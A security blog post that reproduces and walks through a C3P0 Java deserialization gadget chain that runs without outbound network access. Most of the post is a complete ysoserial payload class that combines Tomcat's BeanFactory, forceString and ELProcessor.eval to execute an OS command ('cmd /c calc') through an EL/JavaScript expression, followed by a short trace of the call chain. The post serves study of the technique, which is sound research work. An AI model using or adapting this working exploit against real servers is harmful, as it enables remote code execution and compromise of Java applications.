[Java Security] Learning C3P0 deserialization exploitation without outbound network access

Posted by Y4tacker

Reference article

This post reproduces an article by 雨了个雨 (yulegeyu). The idea is a good one; after reading it, it is in fact the same idea as the JNDI bypass for JDK 8u191 and later, which I will reproduce and study next.

Constructing the gadget chain

Having gone through the basic ysoserial flow yesterday, this one is relatively simple. The difference is that ysoserial's payload ends up using a URLClassLoader, whereas this one uses the current thread's ClassLoader. I had always assumed that path was useless; I simply had not learned enough. The author's insight was to go through Tomcat's getObjectInstance method to call ELProcessor's eval method and achieve expression injection.

package ysoserial.payloads;


import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;

import org.apache.naming.ResourceRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 yulegeyu modified
 */
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0Tomcat implements ObjectPayload<Object> {
    public Object getObject ( String command ) throws Exception {

        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null));
        return b;
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            // ResourceRef pointing at javax.el.ELProcessor, with org.apache.naming.factory.BeanFactory
            // as the factory and no factory class location (null), so the factory is loaded from the
            // current thread's ClassLoader rather than a URLClassLoader.
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            // forceString maps the "x" property onto ELProcessor.eval(String)
            ref.add(new StringRefAddr("forceString", "x=eval"));
            String cmd = "calc";
            // EL expression evaluated by BeanFactory via the forced setter
            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"javascript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','"+ cmd +"']).start()\")"));
            return ref;
        }

        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }


    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(C3P0Tomcat.class, new String[]{"calc"});
    }

}

Analyzing the gadget chain

I will not go into every detail, since they were covered in the ysoserial analysis; here I just trace the call chain briefly, starting from PoolBackedDataSourceBase's readObject.
The first object restored is ReferenceSerialized, an instance of IndirectlySerialized.

Step into the getObject call, then continue into referenceToObject.

Unlike before, this time var11 is null, so the factory is loaded from the current thread's ClassLoader rather than a URLClassLoader.

Here org.apache.naming.factory.BeanFactory is instantiated.

As described above:
org.apache.naming.factory.BeanFactory's getObjectInstance() instantiates, via reflection, whatever Bean class the Reference points to, and then calls setter methods to assign every property.
The Bean class name, the property names and the property values all come from the Reference object, and all of them are attacker-controlled.

Reflective invocation

As can be seen, the trigger succeeds here.
